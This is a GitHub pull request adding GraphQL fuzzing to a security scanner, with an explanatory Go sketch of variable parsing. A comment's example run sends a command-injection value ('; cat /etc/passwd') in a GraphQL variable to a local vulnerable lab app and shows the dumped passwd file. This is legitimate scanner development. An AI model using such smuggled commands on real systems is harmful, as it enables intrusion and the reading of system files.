
feat: added initial graphql fuzzing support #5716

Draft
wants to merge 3 commits into base: dev

Conversation

ehsandeep
Member

@ehsandeep ehsandeep commented Oct 10, 2024

Proposed changes

  • Get param graphql fuzzing support
  • Improve validation for graphql detection
  • Introspection linking (file, url, automatic)
  • Test cases

Checklist

  • Pull request is created against the dev branch
  • All checks passed (lint, unit/integration/regression tests etc.) with my changes
  • I have added tests that prove my fix is effective or that my feature works
  • I have added necessary documentation (if appropriate)

@Ice3man543
Member

Example run:

[INF] [cmdi-blind-oast-polyglot] Fuzz points for http://localhost:5013/graphql [POST]
{
  "body": {
    "host": "example.com",
    "path": "/robots.txt",
    "port": "80",
    "scheme": "http"
  }
}
[INF] [cmdi-blind-oast-polyglot] Dumped HTTP request for http://localhost:5013/graphql

POST /graphql HTTP/1.1
Host: localhost:5013
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Length: 291
Accept: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Content-Type: application/json
Cookie: env=graphiql:disable
Origin: http://localhost:5013
Priority: u=0
Referer: http://localhost:5013/import_paste
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"query":"mutation ImportPaste($host: String!, $port: Int!, $path: String!, $scheme: String!) {\n  importPaste(host: $host, port: $port, path: $path, scheme: $scheme) {\n    result\n  }\n}\n","variables":{"scheme":"http","host":"example.com","port":80,"path":"/robots.txt; cat /etc/passwd"}}
[VER] [cmdi-blind-oast-polyglot] Sent HTTP request to http://localhost:5013/graphql
[DBG] [cmdi-blind-oast-polyglot] Dumped HTTP response http://localhost:5013/graphql

HTTP/1.1 200 OK
Content-Length: 2130
Content-Type: application/json
Date: Thu, 10 Oct 2024 10:00:11 GMT

{"data":{"importPaste":{"result":"<!doctype html>\n<html>\n<head>\n    <title>Example Domain</title>\n\n    <meta charset=\"utf-8\" />\n    <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n    <style type=\"text/css\">\n    body {\n        background-color: #f0f0f2;\n        margin: 0;\n        padding: 0;\n        font-family: -apple-system, system-ui, BlinkMacSystemFont, \"Segoe UI\", \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n        \n    }\n    div {\n        width: 600px;\n        margin: 5em auto;\n        padding: 2em;\n        background-color: #fdfdff;\n        border-radius: 0.5em;\n        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n    }\n    a:link, a:visited {\n        color: #38488f;\n        text-decoration: none;\n    }\n    @media (max-width: 700px) {\n        div {\n            margin: 0 auto;\n            width: auto;\n        }\n    }\n    </style>    \n</head>\n\n<body>\n<div>\n    <h1>Example Domain</h1>\n    <p>This domain is for use in illustrative examples in documents. You may use this\n    domain in literature without prior coordination or asking for permission.</p>\n    <p><a href=\"https://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\nroot:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/mail:/sbin/nologin\nnews:x:9:13:news:/usr/lib/news:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\ncron:x:16:16:cron:/var/spool/cron:/sbin/nologin\nftp:x:21:21::/var/lib/ftp:/sbin/nologin\nsshd:x:22:22:sshd:/dev/null:/sbin/nologin\ngames:x:35:35:games:/usr/games:/sbin/nologin\nntp:x:123:123:NTP:/var/empty:/sbin/nologin\nguest:x:405:100:guest:/dev/null:/sbin/nologin\nnobody:x:65534:65534:nobody:/:/sbin/nologin\ndvga:x:1000:1000:Linux User,,,:/home/dvga:/bin/sh\n"}}}
[cmdi-blind-oast-polyglot:regex-1] [http] [high] http://localhost:5013/graphql [body:path] [POST]
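The two mechanisms this PR describes, stricter GraphQL detection and turning the operation's variables into fuzz points, can be shown in a few dozen lines of Go. The block below is an added illustration written for this page; it is not nuclei's code and the names `ParseGraphQLBody`, `FuzzPoints`, `SetVariable` and `sampleBody` are mine. `sampleBody` is a constructed request modelled on the dump in the comment above, carrying the benign `/robots.txt` path from the fuzz-point listing. It goes a little beyond the log: it reads the declared type of each variable (`$port: Int!`) out of the operation, so that a value injected into an `Int` variable is sent as an integer, which is why the dump above shows `port` as `"80"` in the fuzz-point listing but `80` in the request that is actually sent.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// GraphQLRequest is the JSON body a GraphQL client POSTs over HTTP.
type GraphQLRequest struct {
	Query     string                 `json:"query"`
	Variables map[string]interface{} `json:"variables,omitempty"`
}

// FuzzPoint: a scalar in "variables" with its name (no "$"), declared type and current value.
type FuzzPoint struct{ Name, Type, Value string }

var (
	// A GraphQL document starts with an operation keyword or an anonymous selection set.
	opRe = regexp.MustCompile(`^\s*(?:query|mutation|subscription)\b|^\s*\{`)
	// "$name: Type" inside the operation's variable definitions ("$host: String!").
	varDeclRe = regexp.MustCompile(`\$(\w+)\s*:\s*([\w\[\]!]+)`)
)

// sampleBody is a constructed body modelled on the PR comment's dump, with the benign path.
const sampleBody = `{"query":"mutation ImportPaste($host: String!, $port: Int!, $path: String!, $scheme: String!) {\n  importPaste(host: $host, port: $port, path: $path, scheme: $scheme) {\n    result\n  }\n}\n","variables":{"scheme":"http","host":"example.com","port":80,"path":"/robots.txt"}}`

// ParseGraphQLBody accepts a POST body only when it is JSON, its "query" looks like a
// GraphQL document and its "variables" (if present) is an object; other JSON APIs are rejected.
func ParseGraphQLBody(contentType string, body []byte) (*GraphQLRequest, error) {
	if !strings.HasPrefix(strings.ToLower(contentType), "application/json") {
		return nil, fmt.Errorf("graphql: content type %q is not application/json", contentType)
	}
	dec := json.NewDecoder(bytes.NewReader(body))
	dec.UseNumber() // keep 80 as json.Number, not float64, so it re-encodes as an integer
	var req GraphQLRequest
	if err := dec.Decode(&req); err != nil {
		return nil, fmt.Errorf("graphql: body is not a GraphQL JSON object: %w", err)
	}
	if !opRe.MatchString(req.Query) {
		return nil, fmt.Errorf("graphql: %q does not look like a GraphQL document", req.Query)
	}
	return &req, nil
}

// FuzzPoints lists the scalar variables in declaration order; objects, lists and nulls are skipped.
func FuzzPoints(req *GraphQLRequest) []FuzzPoint {
	var points []FuzzPoint
	for _, m := range varDeclRe.FindAllStringSubmatch(req.Query, -1) {
		name, typ := m[1], m[2]
		switch v := req.Variables[name]; v.(type) {
		case string, json.Number, bool:
			points = append(points, FuzzPoint{Name: name, Type: typ, Value: fmt.Sprint(v)})
		}
	}
	return points
}

// SetVariable returns a copy of the body with one variable replaced, coerced to its declared
// type. Non-integer text is refused for Int variables: the server rejects it during validation.
func SetVariable(req *GraphQLRequest, name, value string) ([]byte, error) {
	var typ string
	for _, p := range FuzzPoints(req) {
		if p.Name == name {
			typ = p.Type
		}
	}
	if typ == "" {
		return nil, fmt.Errorf("graphql: $%s is not a scalar fuzz point", name)
	}
	vars := make(map[string]interface{}, len(req.Variables))
	for k, v := range req.Variables {
		vars[k] = v
	}
	if strings.TrimSuffix(typ, "!") == "Int" {
		n, err := strconv.ParseInt(value, 10, 32)
		if err != nil {
			return nil, fmt.Errorf("graphql: $%s is %s but %q is not an integer", name, typ, value)
		}
		vars[name] = n
	} else { // String, ID and custom scalars travel as strings
		vars[name] = value
	}
	return json.Marshal(GraphQLRequest{Query: req.Query, Variables: vars})
}

func main() {
	req, err := ParseGraphQLBody("application/json", []byte(sampleBody))
	if err != nil {
		panic(err)
	}
	for _, p := range FuzzPoints(req) {
		fmt.Printf("$%-6s %-8s %s\n", p.Name, p.Type, p.Value)
	}
	body, _ := SetVariable(req, "path", "/probe-marker") // constructed marker value
	fmt.Println(string(body))
}
```

`ParseGraphQLBody` is the validation half: a body such as `{"query":"SELECT 1"}` or one whose `variables` is an array fails to parse, so a generic JSON endpoint is not mistaken for GraphQL. `FuzzPoints` and `SetVariable` are the fuzzing half: the marker `/probe-marker` goes into `$path` as a string while `$port` stays the integer `80`, and asking to put text into `$port` returns an error instead of producing a request the server would reject before its resolver ran.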

Successfully merging this pull request may close these issues.

[FEATURE] graphql fuzzing support with dast templates